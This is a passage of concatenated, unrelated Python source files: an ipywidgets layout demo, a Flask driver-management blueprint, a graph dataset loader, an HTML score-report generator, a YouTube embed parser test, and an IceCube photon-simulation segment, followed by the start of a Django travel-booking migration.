min_width_px_percent.observe(on_min_width_px_percent_change)

# In[ ]:

# Now set up max-width controls
max_width = widgets.IntSlider(
    value=int(widgetGroup.layout.max_width.replace('%', '').replace('px', '')),
    min=0,
    max=1000,
    step=1,
    description='max_width:',
    disabled=False,
    continuous_update=False,
    orientation='horizontal',
    readout=True,
    readout_format='d'
)

def on_max_width_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.max_width = str(change.new) + max_width_px_percent.value
        pythonCode.value = str(widgetGroup.layout)

max_width.observe(on_max_width_change)

max_width_px_percent = widgets.ToggleButtons(
    options=['px', '%', ],
    description='',
    disabled=False,
    button_style='',  # 'success', 'info', 'warning', 'danger' or ''
    tooltips=['Pixels', 'Percent of page', ],
)
max_width_px_percent.style.button_width = sizeButtonWidth  # ipywidgets 7.0 and above
vboxwidgetSizeList.append(widgets.HBox([max_width, max_width_px_percent]))

def on_max_width_px_percent_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.max_width = str(max_width.value) + change.new
        pythonCode.value = str(widgetGroup.layout)

max_width_px_percent.observe(on_max_width_px_percent_change)
# In[ ]:

# max-height controls
max_height = widgets.IntSlider(
    value=int(widgetGroup.layout.max_height.replace('%', '').replace('px', '')),
    min=0,
    max=1000,
    step=1,
    description='max_height:',
    disabled=False,
    continuous_update=False,
    orientation='horizontal',
    readout=True,
    readout_format='d'
)

def on_max_height_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.max_height = str(change.new) + max_height_px_percent.value
        pythonCode.value = str(widgetGroup.layout)

max_height.observe(on_max_height_change)

max_height_px_percent = widgets.ToggleButtons(
    options=['px', '%', ],
    description='',
    disabled=False,
    button_style='',  # 'success', 'info', 'warning', 'danger' or ''
    tooltips=['Pixels', 'Percent of page', ],
)
max_height_px_percent.style.button_width = sizeButtonWidth  # ipywidgets 7.0 and above
vboxwidgetSizeList.append(widgets.HBox([max_height, max_height_px_percent]))

def on_max_height_px_percent_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.max_height = str(max_height.value) + change.new
        pythonCode.value = str(widgetGroup.layout)

max_height_px_percent.observe(on_max_height_px_percent_change)

# In[ ]:

# min-height controls
min_height = widgets.IntSlider(
    value=int(widgetGroup.layout.min_height.replace('%', '').replace('px', '')),
    min=0,
    max=1000,
    step=1,
    description='min_height:',
    disabled=False,
    continuous_update=False,
    orientation='horizontal',
    readout=True,
    readout_format='d'
)

def on_min_height_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.min_height = str(change.new) + min_height_px_percent.value
        pythonCode.value = str(widgetGroup.layout)

min_height.observe(on_min_height_change)

min_height_px_percent = widgets.ToggleButtons(
    options=['px', '%', ],
    description='',
    disabled=False,
    button_style='',  # 'success', 'info', 'warning', 'danger' or ''
    tooltips=['Pixels', 'Percent of page', ],
)
min_height_px_percent.style.button_width = sizeButtonWidth
vboxwidgetSizeList.append(widgets.HBox([min_height, min_height_px_percent]))

def on_min_height_px_percent_change(change):
    if change['type'] == 'change' and change['name'] == 'value':
        widgetGroup.layout.min_height = str(min_height.value) + change.new
        pythonCode.value = str(widgetGroup.layout)

min_height_px_percent.observe(on_min_height_px_percent_change)
# ### Create `VBox` to hold size controls

# In[ ]:

widgetSizeVbox = widgets.VBox(vboxwidgetSizeList)

# ### Collate all the widgets and display

# In[ ]:

# Final composition: code read-back on top, the two control columns in the
# middle, and the live demo box at the bottom.  `layout` is the module's
# single exported name (see __all__).
hbox = widgets.HBox([vbox_style_options, widgetSizeVbox, ])
layout = widgets.VBox([pythonCode, hbox, widgetGroupAndTitle, ])
layout
|
from flask import Blueprint, jsonify, render_template, request, url_for
from flask_login import login_required
from app.models.entities.driver import Driver
from app.models.view.driver_view_model import DriverViewModel
from app.service.driver_service import DriverService
from app.utils import TEMPLATES_ROOT_PATH
# Blueprint for all /driver routes; templates resolve from the shared root.
driver = Blueprint('driver', __name__, template_folder=TEMPLATES_ROOT_PATH, url_prefix="/driver")
driver_service = DriverService()


@driver.route('/')
@login_required
def index():
    """List every registered driver."""
    return render_template('driver/index.html', drivers=driver_service.get_all())
@driver.route('/new', methods=['GET', 'POST'])
@login_required
def register():
    """Show the registration form (GET) or create a new driver (POST)."""
    if request.method == 'GET':
        return render_template('driver/register.html')

    form = request.form
    new_driver = Driver(name=form['name'],
                        birth_date=form['birthdate'],
                        cpf=form['cpf'],
                        address=form['address'])
    result = driver_service.insert_driver(new_driver)
    if result.success:
        result.url = url_for('driver.index')
    return jsonify(result.to_json())
@driver.route("<int:id>/update", methods=['GET', 'POST'])
@login_required
def update(id):
    """Show the edit form (GET) or apply the submitted changes (POST)."""
    driver = Driver.query.get_or_404(id)
    if request.method == 'GET':
        return render_template('driver/update.html', driver=driver)

    form = request.form
    driver_view = DriverViewModel(name=form["name"],
                                  birth_date=form["birthdate"],
                                  address=form["address"])
    result = driver_service.update_driver(driver, driver_view)
    if result.success:
        result.url = url_for('driver.index')
    return jsonify(result.to_json())
@driver.route("<int:id>/delete", methods=['GET'])
@login_required
def delete(id):
    """Remove the driver with the given id and report the outcome as JSON."""
    target = Driver.query.get_or_404(id)
    result = driver_service.delete_driver(target)
    if result.success:
        result.url = url_for('driver.index')
    return jsonify(result.to_json())
import networkx as nx
import os
import numpy as np
from tqdm import tqdm
import copy
def ext(name):
    """Map a language name to its source-file extension.

    Raises KeyError for an unknown language, matching the original
    dict-lookup behavior.
    """
    extensions = {'julia': '.jl'}
    return extensions[name]
def load_graph(data_dir, min_num_nodes, max_num_nodes, node_labels, graph_labels):
    """Load a repository-tree dataset into a list of NetworkX digraphs.

    Parameters
    ----------
    data_dir : str
        Dataset directory; its basename is the dataset name and every file
        inside is expected to be prefixed with it ('<name>_A.txt', ...).
    min_num_nodes, max_num_nodes : int
        Inclusive bounds on the node count of subgraphs that are kept.
    node_labels : bool
        Read the structured node-label file when True, otherwise the plain
        (node_id, graph_id) indicator file.
    graph_labels : bool
        Read structured per-graph metadata and attach it to each subgraph.

    Returns
    -------
    list of networkx.DiGraph
        One subgraph per tree id satisfying the size bounds that contains at
        least one file with the language's extension (see ext()).
    """
    # Each file should contain the dataset name at the front of the file.
    name = data_dir.split('/')[-1]
    # Edge list: (node_x, node_y)
    data_adj = np.loadtxt(
        fname=os.path.join(data_dir, '{}_A.txt'.format(name)),
        delimiter='|').astype(int)
    if node_labels:
        # (node_id, **info)
        data_node_label = np.loadtxt(
            fname=os.path.join(data_dir, '{}_node_labels.txt'.format(name)),
            delimiter='|',
            dtype={
                'names': ('node_id', 'tree_id', 'node_type', 'node_name', 'node_path'),
                'formats': ('i4', 'i4', 'S4', 'S100', 'S250')
            }
        )
    else:
        # (node_id, graph_id)
        data_node_label = np.loadtxt(
            fname=os.path.join(data_dir, '{}_graph_indicators.txt'.format(name)),
            delimiter='|').astype(int)
    # (graph_id, **info)
    if graph_labels:
        data_graph_label = np.loadtxt(
            fname=os.path.join(data_dir, '{}_graph_labels.txt'.format(name)),
            delimiter='|',
            dtype={
                'names': ('tree_id', 'tree_name', 'language', 'stars', 'git_uri', 'last_update'),
                'formats': ('i4', 'S100', 'S100', 'i4', 'S250', 'S100')
            }
        )
    else:
        # (graph_id)
        # BUG FIX: this branch previously assigned to data_node_label,
        # clobbering the node labels and leaving data_graph_label undefined
        # for the loop below.  The single column is kept 2-D so the
        # data_graph_label[i][0] indexing below works in this branch too.
        # NOTE(review): delimiter ',' differs from the '|' used elsewhere —
        # confirm against the actual file format.
        data_graph_label = np.loadtxt(
            fname=os.path.join(data_dir, '{}_graph_labels.txt'.format(name)),
            delimiter=',',
            usecols=0).astype(int).reshape(-1, 1)
    DG = nx.DiGraph()
    # Add Edges
    data_tuple = list(map(tuple, data_adj))
    DG.add_edges_from(data_tuple)
    # Add Nodes
    node_bar = tqdm(range(data_node_label.shape[0]))
    for i in node_bar:
        # node_bar.set_description("Processing node {}".format(i))
        if node_labels:
            DG.add_node(data_node_label[i][0],
                        label=data_node_label[i][0],
                        tree_id=data_node_label[i][1],
                        node_type=data_node_label[i][2],
                        node_name=data_node_label[i][3],
                        node_path=data_node_label[i][4],
                        )
        else:
            DG.add_node(data_node_label[i][0],
                        label=data_node_label[i][0],
                        tree_id=data_node_label[i][1]
                        )
    # Drop disconnected nodes and self-loops before splitting into trees.
    isolates = list(nx.isolates(DG))
    selfloops = list(nx.selfloop_edges(DG))
    if isolates or selfloops:
        print("Removing isolates ({}) and selfloops ({})".format(
            len(isolates),
            len(selfloops)
        ))
        DG.remove_nodes_from(isolates)
        DG.remove_edges_from(selfloops)
    # Group node ids by tree and record whether any node's name carries the
    # language's file extension.
    tree_id_node_list = dict()
    tree_id_lang = dict()
    for n in DG.nodes.data():
        tree_id = n[1]['tree_id']
        if tree_id not in tree_id_node_list:
            tree_id_node_list[tree_id] = []
            tree_id_lang[tree_id] = False
        tree_id_node_list[tree_id].append(n[0])
        # check if the language extension (e.g. '.jl') exists
        if ext(name) in n[1]['node_name'].decode("utf-8"):
            tree_id_lang[tree_id] = True
    graphs = []
    graph_bar = tqdm(range(data_graph_label.shape[0]))
    for i in graph_bar:
        # graph_bar.set_description("Processing graph {}".format(i))
        tree_id = data_graph_label[i][0]
        # Search for nodes with same tree-id
        nodes = tree_id_node_list[tree_id]
        # Language file exists for this tree?
        lang = tree_id_lang[tree_id]
        # Create sub-graph (copy so graph attributes can be set)
        G_sub = DG.subgraph(nodes).copy()
        G_sub.graph['label'] = tree_id
        # Attach per-graph metadata when available.
        if graph_labels:
            G_sub.graph['tree_id'] = tree_id
            G_sub.graph['tree_name'] = data_graph_label[i][1]
            G_sub.graph['language'] = data_graph_label[i][2]
            G_sub.graph['stars'] = data_graph_label[i][3]
            G_sub.graph['git_uri'] = data_graph_label[i][4]
            G_sub.graph['last_update'] = data_graph_label[i][5]
        if G_sub.number_of_nodes() >= min_num_nodes \
                and G_sub.number_of_nodes() <= max_num_nodes \
                and lang:
            graphs.append(G_sub)
            # print(G_sub.graph['tree_name'], G_sub.graph['tree_id'])
    return graphs
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
'''
Contains the functions for printing the evaluation results in an HTML file
'''
def coda_html(num, ill_drs_ids, counts, measures, types, cr_mdict):
    '''Gets the number of CLFs, ids of ill DRSs, counts for produced, gold and matching clauses,
    evaluation measures like precision, recall and F-scores, the list of detailed metrics,
    and their corresponding evaluation measures.
    Output is an html content representing the input.

    num: total number of system-gold CLF pairs.
    ill_drs_ids: ids of system outputs that are not well-formed DRSs.
    counts: (produced, gold, matching) clause totals.
    measures: overall (precision, recall, f-score) triple.
    types: clause-type names; each must be a key of cr_mdict.
    cr_mdict: clause type -> (precision, recall, f-score).
    Returns the full HTML document as a single string.
    '''
    # unpack tuples
    (prod_cl, gold_cl, match_cl) = counts
    # Order the per-type rows canonically (see lab2num).
    types = sorted(types, key=lambda x: lab2num(x))
    # internal css style and other styling
    style = ("table, th, td { border: 1px solid black; border-collapse: collapse;}\n"
             "#tot {background-color: #222; color: #fff; font-weight: bold;}\n"
             "td {text-align: right;}\n"
             ".ltd {text-align: left;}\n"
             "th {background-color: #648ca8; color: #fff;}\n"
             "th, td {padding: 2px 10px 2px 10px;}\n"
             ".oddrow {background-color: #eee;}\n"
             ".evenrow {background-color: #fff;}\n"
             '.mono {font-family: "Courier New", Courier, monospace;}\n'
             )
    header = '<head>\n<style>\n{}\n</style>\n</head>'.format(style)
    tag = 'p'
    # generating the content
    body = '<{0}>Number of system-gold pairs of CLFs: <b>{1}</b></{0}>\n'.format(
        tag, num)
    body += '<{0}>Number of ill CLFs (i.e. non-DRSs) produced by the system: <b>{1}</b></{0}>\n'.format(
        tag, len(ill_drs_ids))
    body += '<{0}>Total number of clauses in system / gold CLFs: <b>{1}</b> / <b>{2}</b></{0}>\n'.format(
        tag, prod_cl, gold_cl)
    body += '<{0}>Total number of matching clauses: <b>{1}</b></{0}>\n'.format(
        tag, match_cl)
    # create the table with scores
    body += '<table style="width:100%">\n'
    body += '<tr>\n<th>Clause types</th>\n<th>Precision</th>\n<th>Recall</th>\n<th>F-score</th>\n</tr>\n'
    # One row per clause type, with alternating row shading.
    for (i, c) in enumerate(types):
        sty = 'evenrow' if i % 2 == 0 else 'oddrow'
        body += '<tr class="{}">\n<td class="ltd">{}</td>\n<td>{:.2%}</td>\n<td>{:.2%}</td>\n<td>{:.2%}</td>\n</tr>\n'.format(
            sty, indent(c), *cr_mdict[c])
    body += '<tr id="tot">\n<td class="ltd">Total</td>\n<td>{:.2%}</td>\n<td>{:.2%}</td>\n<td>{:.2%}</td>\n</tr>\n'.format(
        *measures)
    # close the table
    body += '</table>\n'
    # print the list of ill-CLF ids
    if ill_drs_ids:
        body += '<p>{}: <span class="mono">{}</span></p>\n'.format(
            'IDs of ill CLFs', ', '.join(map(str, ill_drs_ids)))
    return '<!DOCTYPE html>\n<meta charset=utf-8>\n<html>\n{}\n<body>\n{}\n</body>\n</html>'.format(header, body)
def indent(label, n=4):
    '''Indent the clause types
    'operators','roles','concepts','nouns','verbs','adjectives','adverbs','events'
    '''
    # Noun/adverb/event rows are nested one level (n spaces); adjectives and
    # verbs two levels.  Everything else is shown flush and title-cased.
    pad = ' ' * n
    special = {
        'nouns': pad + 'Nouns',
        'adverbs': pad + 'Adverbs',
        'events': pad + 'Events',
        'adjectives': pad * 2 + 'Adjectives',
        'verbs': pad * 2 + 'Verbs',
    }
    return special.get(label, label.title())
def lab2num(label):
    '''Map the type to a number for the ordering purposes:
    'operators','roles','concepts','nouns','verbs','adjectives','adverbs','events'
    '''
    # Entries listed in rank order; KeyError for unknown labels, as before.
    rank = {
        'operators': 1,
        'roles': 2,
        'concepts': 3,
        'nouns': 4,
        'events': 5,
        'verbs': 6,
        'adjectives': 7,
        'adverbs': 8,
    }
    return rank[label]
|
# -*- coding: utf-8 -*-
import pytest
from html2ans.parsers.embeds import YoutubeEmbedParser
# Each case pairs a YouTube embed iframe (http or https, with or without
# query parameters) with the canonical watch URL the parser should extract.
@pytest.mark.parametrize('tag_string,expected_id', [
    ('<iframe src="https://www.youtube.com/embed/7IBERQ9abkk?feature=oembed"></iframe>',
     "https://www.youtube.com/watch?v=7IBERQ9abkk"),
    ('<iframe src=\"http://www.youtube.com/embed/gZnNmCf2Zok\"></iframe>',
     "https://www.youtube.com/watch?v=gZnNmCf2Zok"),
    ('<iframe src=\"http://www.youtube.com/embed/OVK-tGUZy9A?rel=0\"></iframe>',
     "https://www.youtube.com/watch?v=OVK-tGUZy9A"),
    ('<iframe src="https://www.youtube.com/embed/3TqLNkLdpGY"></iframe>',
     "https://www.youtube.com/watch?v=3TqLNkLdpGY"),
    ('<iframe src="https://www.youtube.com/embed/4I86iz4X4jM"></iframe>',
     "https://www.youtube.com/watch?v=4I86iz4X4jM")
])
def test_embed_parser(tag_string, expected_id, make_http_tag, make_https_tag):
    # Exercise both tag-building fixtures against every sample iframe.
    for test_function in [make_http_tag, make_https_tag]:
        embed_tag = test_function(tag_string, "iframe")
        result, match = YoutubeEmbedParser().parse(embed_tag)
        assert match is True
        assert result["type"] == "reference"
        assert result["referent"]["id"] == expected_id
        assert result["referent"]["type"] == "youtube"
        assert result["referent"]["provider"] == YoutubeEmbedParser.provider
|
#!/usr/bin/env python
import os
import subprocess
import threading
import time
import logging
from os.path import expandvars
from icecube import icetray, dataclasses
import math
def taskset(pid, tt=None):
    """Get or set the CPU-affinity mask of *pid* via /bin/taskset.

    tt, when given, is a string of binary digits (one per core) and is
    converted to the hex mask taskset expects; nothing is returned.
    With tt omitted, the current mask is read back and returned as a
    binary-digit string.

    NOTE(review): Popen output is parsed with str operations — this assumes
    a Python-2-era environment where communicate() returns str; under
    Python 3 it returns bytes.  Confirm the target interpreter.
    """
    # get/set the taskset affinity for pid
    # uses a binary number string for the core affinity
    l = ['/bin/taskset', '-p']
    if tt:
        # binary string -> hex digits, leading '0x' stripped
        l.append(hex(int(tt, 2))[2:])
    l.append(str(pid))
    p = subprocess.Popen(l, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # taskset prints e.g. "pid 123's current affinity mask: f"
    output = p.communicate()[0].split(':')[-1].strip()
    if not tt:
        return bin(int(output, 16))[2:]
def tasksetInUse():
    """Return True when this process is pinned to a subset of the CPUs.

    Compares the taskset affinity string against the number of processors
    listed in /proc/cpuinfo.  Any failure (non-Linux, taskset missing, ...)
    is treated as "no affinity in use".
    """
    # check for cpu affinity (taskset)
    try:
        # BUG FIX: the original used the bare builtin `reduce`, which no
        # longer exists in Python 3; the resulting NameError was silently
        # swallowed by the broad except, making this always return False.
        with open('/proc/cpuinfo') as cpuinfo:
            num_cpus = sum(1 for line in cpuinfo if 'processor' in line)
        affinity = taskset(os.getpid())
        if len(affinity) < num_cpus:
            return True
        for x in affinity[:num_cpus]:
            if x != '1':
                return True
        return False
    except Exception:
        return False
def resetTasksetThreads(main_pid):
    """Best-effort: re-enable all CPUs for every thread of *main_pid*.

    Sleeps first so any batch-system affinity setup has settled, then walks
    the thread ids reported by ps and resets each one's mask to all cores.
    All failures are deliberately ignored.
    """
    # reset thread taskset affinity
    time.sleep(60)
    try:
        # BUG FIX: replaced the Python-2-only builtin `reduce` (NameError on
        # Python 3, previously masked by the broad except) with sum().
        with open('/proc/cpuinfo') as cpuinfo:
            num_cpus = sum(1 for line in cpuinfo if 'processor' in line)
        tt = '1' * num_cpus
        p = subprocess.Popen(['/bin/ps', '-Lo', 'tid', '--no-headers', '%d' % main_pid],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        for tid in p.communicate()[0].split():
            tid = tid.strip()
            if tid:
                taskset(tid, tt)
    except Exception:
        pass
def LoadCascadeTables(IceModel="SpiceMie", TablePath="/data/sim/sim-new/spline-tables"):
    """Build an I3PhotoSplineService for cascades from the spline tables
    matching *IceModel* under *TablePath*.

    Raises RuntimeError for an unrecognized ice model name.
    """
    from icecube import photonics_service
    if IceModel == "Spice1":
        amplitudetable = TablePath + '/ems_spice1_z20_a10.abs.fits'
        timingtable = TablePath + '/ems_spice1_z20_a10.prob.fits'
    elif IceModel == "SpiceMie":
        amplitudetable = TablePath + '/ems_mie_z20_a10.abs.fits'
        timingtable = TablePath + '/ems_mie_z20_a10.prob.fits'
    elif IceModel == "SpiceMieNoHoleIce":
        amplitudetable = TablePath + '/NoHoleIceCascades_250_z20_a10.abs.fits'
        timingtable = TablePath + '/NoHoleIceCascades_250_z20_a10.prob.fits'
    else:
        # BUG FIX: the model name was passed as a spare exception argument and
        # never interpolated into the message.
        raise RuntimeError("Unknown ice model: %s" % IceModel)
    # BUG FIX: the table paths were passed as %-style arguments to format
    # strings with no '%s' placeholder, so logging dropped them (and logged an
    # internal formatting error instead).
    logging.debug("Loading cascade tables : ")
    logging.debug(" amp  = %s", amplitudetable)
    logging.debug(" time = %s", timingtable)
    cascade_service = photonics_service.I3PhotoSplineService(
        amplitudetable=amplitudetable,
        timingtable=timingtable,
        timingSigma=0.,
        maxRadius=800. * icetray.I3Units.meter)
    return cascade_service
@icetray.traysegment
def PropagatePhotons(tray, name,
                     GCDFile,
                     If=lambda f: True,
                     RandomService=None,
                     KeepIndividualMaps=False,
                     HybridMode=False,
                     IgnoreMuons=False,
                     IgnoreCascades=False,
                     UseGPUs=False,
                     UseAllCPUCores=False,
                     KeepSlicedMCTree=False,
                     IceModel="spice_3.2",
                     CascadeService=None,
                     IceModelLocation=None,
                     UseCascadeExtension=True,
                     UseGeant4=False,
                     CrossoverEnergyEM=None,
                     CrossoverEnergyHadron=None,
                     UnshadowedFraction=1.0,  # changed 2014-10-16 to IC86 nominal preset, IC79 used 0.9
                     DOMOversizeFactor=5.0,
                     HoleIceParameterization=expandvars("$I3_SRC/ice-models/resources/models/angsens/as.h2-50cm"),
                     InputMCTree="I3MCTree",
                     UseI3PropagatorService=False,
                     OutputPESeriesMapName="I3MCPESeriesMap",
                     OutputPhotonSeriesName=None,
                     ):
    """ This traysegment offers multiple tweaks for adapted processing in different energy ranges,
    for example GEANT4 in conjunction with Parametrizations for the treatment for lowest energies
    and a HybridMode with the use of tables for the treatment of high energies.
    In any case, please refer to the documentation of clsim to find suitable settings for your
    simulation needs

    :param tray: the I3Tray instance (supplied by the traysegment machinery)
    :param name: prefix for the module/segment instance names added here
    :param GCDFile: geometry/calibration/detector-status file handed to clsim
    :param HybridMode: if True, cascades are simulated from photon-spline tables
        and only tracks go through clsim; photon saving and Geant4 are unsupported
    :raises RuntimeError: on inconsistent option combinations or unknown ice models
    """
    from I3Tray import I3Units
    from icecube import icetray, dataclasses, dataio
    from icecube import phys_services, sim_services
    from icecube import clsim, photonics_service
    from os import listdir
    from os.path import isdir

    if IgnoreMuons and not HybridMode:
        raise RuntimeError("Can currently only ignore muons in hybrid mode")

    # Resolve the ice model: either a ready-made medium-properties object or a
    # named directory under IceModelLocation (case-insensitive fallback scan).
    clsimIceModel = None
    if IceModelLocation is None:
        IceModelLocation = expandvars("$I3_BUILD/ice-models/resources/models")
    if isinstance(IceModel, clsim.I3CLSimMediumProperties):
        if HybridMode:
            raise RuntimeError("Cannot use custom ice models in hybrid mode")
        clsimIceModel = IceModel
    elif IceModel == "Spice1":
        clsimIceModel = expandvars(IceModelLocation+"/spice_1")
    elif IceModel == "SpiceMie":
        clsimIceModel = expandvars(IceModelLocation+"/spice_mie")
    elif IceModel == "SpiceLea":
        clsimIceModel = expandvars(IceModelLocation+"/spice_lea")
    else:
        for d in listdir(IceModelLocation):
            if isdir(expandvars(IceModelLocation+"/"+d)) and IceModel.lower() == d.lower():
                clsimIceModel = expandvars(IceModelLocation+"/"+d)
                break
        if not clsimIceModel:
            # was: RuntimeError("...%s", IceModel) — args were never interpolated
            raise RuntimeError("Unknown ice model: %s" % IceModel)

    if HybridMode and IceModel not in ("Spice1", "SpiceMie"):
        raise RuntimeError("Can only use Spice1 and SpiceMie in hybrid mode. photon tables do not support ice anisotropy at this time.")

    if (not IgnoreCascades) and HybridMode:
        if CascadeService is None:
            # was: logging.warning("...for", IceModel) — no %s placeholder, so the
            # extra argument triggered a logging formatting error
            logging.warning("*** no cascades tables provided. Loading tables for %s", IceModel)
            # If we can see CVMFS, we'll get the splines from there.
            # Note : when available, switch icecube.wisc.edu for icecube.opensciencegrid.org
            UseSplinesFromCVMFS = os.path.isdir("/cvmfs/icecube.opensciencegrid.org/data/photon-tables/splines")
            if UseSplinesFromCVMFS:
                TablePath = "/cvmfs/icecube.opensciencegrid.org/data/photon-tables/splines"
            else:
                TablePath = "/data/sim/sim-new/spline-tables"
            logging.info("Using splines from CVMFS: %s", UseSplinesFromCVMFS)
            # Work out which splines to use based on ice model preferences
            if(HoleIceParameterization == expandvars('$I3_SRC/ice-models/resources/models/angsens/as.h2-50cm')):
                CascadeModel = IceModel
            elif(HoleIceParameterization == expandvars('$I3_SRC/ice-models/resources/models/angsens/as.nominal')):
                if IceModel == "SpiceMie":
                    CascadeModel = "SpiceMieNoHoleIce"
                else:
                    raise RuntimeError("No no-hole-ice spline for %s" % IceModel)
            else:
                raise RuntimeError("No spline for %s with hole ice param %s" % (IceModel, HoleIceParameterization))
            cascade_service = LoadCascadeTables(IceModel=CascadeModel, TablePath=TablePath)
        else:
            cascade_service = CascadeService
    else:
        cascade_service = None

    if HybridMode:
        if OutputPhotonSeriesName is not None:
            raise RuntimeError("saving photons is not supported in hybrid mode")
        if UseGeant4:
            raise RuntimeError("Geant4 not supported in hybrid mode")
        if ((CrossoverEnergyEM is not None) or (CrossoverEnergyHadron is not None)):
            raise RuntimeError("CrossoverEnergyEM or CrossoverEnergyHadron not supported in hybrid mode")

        # split the MCTree into a cascade-only and a track-only version
        tray.AddModule("I3MCTreeHybridSimulationSplitter", name+"_splitMCTree",
                       InputMCTreeName=InputMCTree,
                       OutputMCTreeNameTracks=InputMCTree+"Tracks",
                       OutputMCTreeNameCascades=InputMCTree+"Cascades")
        tray.AddModule("I3TauSanitizer", name+"_sanitize_taus",
                       InputMCTreeName=InputMCTree+"Tracks",
                       OutputMCTreeName=InputMCTree+"Tracks")  # overwrite the input

        if not IgnoreMuons:
            if UseGPUs:
                DoNotParallelize = False
            else:
                DoNotParallelize = not UseAllCPUCores
                threading.Thread(target=resetTasksetThreads, args=(os.getpid(),)).start()
            # was: logging.debug('... = ', value) — no %s placeholder (logging error)
            logging.debug('tasksetInUse = %s', tasksetInUse())
            logging.debug('DoNotParallelize = %s', DoNotParallelize)

            # simulate tracks (with clsim)
            tray.AddSegment(clsim.I3CLSimMakeHits, name+"_makeCLSimHits",
                            PhotonSeriesName=None,
                            MCTreeName=InputMCTree+"Tracks",
                            OutputMCTreeName=InputMCTree+"Tracks_sliced",
                            MCPESeriesName=OutputPESeriesMapName + "Tracks",
                            UseI3PropagatorService=UseI3PropagatorService,
                            RandomService=RandomService,
                            UnshadowedFraction=UnshadowedFraction,
                            DoNotParallelize=DoNotParallelize,
                            UseGeant4=False,  # never use this with Geant4!
                            UseGPUs=UseGPUs,
                            UseCPUs=not UseGPUs,
                            IceModelLocation=clsimIceModel,
                            DOMOversizeFactor=DOMOversizeFactor,
                            UseCascadeExtension=UseCascadeExtension,
                            GCDFile=GCDFile,
                            DisableTilt=True)  # tables assume tilt-free ice
            tray.AddModule("Delete", name+"_cleanup_clsim_sliced_MCTree",
                           Keys=[InputMCTree+"Tracks_sliced"])

        if not IgnoreCascades:
            tray.AddModule("I3PhotonicsHitMaker", name+"_hitsFromTheTable",
                           CascadeService=cascade_service,
                           TrackService=None,  # tracks are handled by clsim
                           UnshadowedFraction=UnshadowedFraction,
                           Input=InputMCTree+"Cascades",
                           Output=OutputPESeriesMapName + "Cascades",
                           RandomService=RandomService
                           )

        MCPEsToCombine = []
        if not IgnoreMuons:
            MCPEsToCombine.append(OutputPESeriesMapName + "Tracks")
        if not IgnoreCascades:
            MCPEsToCombine.append(OutputPESeriesMapName + "Cascades")

        # combine the resulting I3MCHitSeriesMaps
        tray.AddModule("I3CombineMCPE", name+"_combine_pes",
                       InputResponses=MCPEsToCombine,
                       OutputResponse=OutputPESeriesMapName)
        if not KeepIndividualMaps:
            # delete the original maps and the split I3MCTrees
            tray.AddModule("Delete", name+"_cleanup_peseriesmaps",
                           Keys=MCPEsToCombine)
            tray.AddModule("Delete", name+"_cleanup_MCTree",
                           Keys=[InputMCTree+"Tracks", InputMCTree+"Cascades"])
    else:
        # non-hybrid clsim-only simulation
        # If we're using Geant4, we do NOT want the taus to be dark.
        if not UseGeant4:
            tray.AddModule("I3TauSanitizer", name+"_sanitize_taus",
                           InputMCTreeName=InputMCTree,
                           OutputMCTreeName=InputMCTree)  # overwrite the input

        if UseGPUs:
            DoNotParallelize = False
        else:
            DoNotParallelize = not UseAllCPUCores
            threading.Thread(target=resetTasksetThreads, args=(os.getpid(),)).start()
        logging.debug('tasksetInUse = %s' % tasksetInUse())
        logging.debug('DoNotParallelize = %s' % DoNotParallelize)

        # simulate tracks (with clsim)
        tray.AddSegment(clsim.I3CLSimMakeHits, name+"_makeCLSimHits",
                        PhotonSeriesName=OutputPhotonSeriesName,
                        MCTreeName=InputMCTree,
                        MCPESeriesName=OutputPESeriesMapName,
                        UseI3PropagatorService=UseI3PropagatorService,
                        RandomService=RandomService,
                        UnshadowedFraction=UnshadowedFraction,
                        DoNotParallelize=DoNotParallelize,
                        UseGeant4=UseGeant4,
                        CrossoverEnergyEM=CrossoverEnergyEM,
                        CrossoverEnergyHadron=CrossoverEnergyHadron,
                        UseGPUs=UseGPUs,
                        UseCPUs=not UseGPUs,
                        DOMOversizeFactor=DOMOversizeFactor,
                        HoleIceParameterization=HoleIceParameterization,
                        IceModelLocation=clsimIceModel,
                        GCDFile=GCDFile,
                        UseCascadeExtension=UseCascadeExtension)
|
# Generated by Django 3.2.5 on 2021-11-29 18:37
from django.db import migrations, models
import django.db.models.deletion
import django.db.models.expressions
class Migration(migrations.Migration):
    """Initial schema for the TravelBooking app: admins, customers,
    locations, and bus/flight/hotel inventory plus their reservation tables.

    Auto-generated (Django 3.2.5); do not edit applied operations in place —
    schema changes belong in a new migration.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='ADMINS',
            fields=[
                ('adminID', models.IntegerField(primary_key=True, serialize=False, unique=True)),
                ('adminName', models.CharField(max_length=50)),
                # NOTE(review): password stored as a plain CharField — presumably
                # unhashed; confirm against the auth flow.
                ('password', models.CharField(max_length=50)),
            ],
        ),
        migrations.CreateModel(
            name='BUS',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('price', models.IntegerField()),
                ('numSeats', models.IntegerField()),
                ('numAvail', models.IntegerField()),
            ],
        ),
        migrations.CreateModel(
            name='CUSTOMERS',
            fields=[
                ('custID', models.IntegerField(primary_key=True, serialize=False, unique=True)),
                ('custName', models.CharField(max_length=50)),
                ('password', models.CharField(max_length=50)),
                ('balance', models.IntegerField()),
            ],
        ),
        migrations.CreateModel(
            name='FLIGHTS',
            fields=[
                ('flightNum', models.CharField(max_length=50, primary_key=True, serialize=False, unique=True)),
                ('price', models.IntegerField()),
                ('numSeats', models.IntegerField()),
                # NOTE(review): 'numAvial' looks like a typo for 'numAvail'
                # (cf. BUS/HOTELS) — renaming requires a follow-up migration.
                ('numAvial', models.IntegerField()),
            ],
        ),
        migrations.CreateModel(
            name='LOCATIONS',
            fields=[
                ('location', models.CharField(max_length=50, primary_key=True, serialize=False, unique=True)),
                # Risk levels are Chinese labels: 低=low, 中=medium, 高=high.
                ('riskLevel', models.CharField(choices=[('低', '低'), ('中', '中'), ('高', '高')], default='低', max_length=50)),
            ],
        ),
        migrations.CreateModel(
            name='HOTELS',
            fields=[
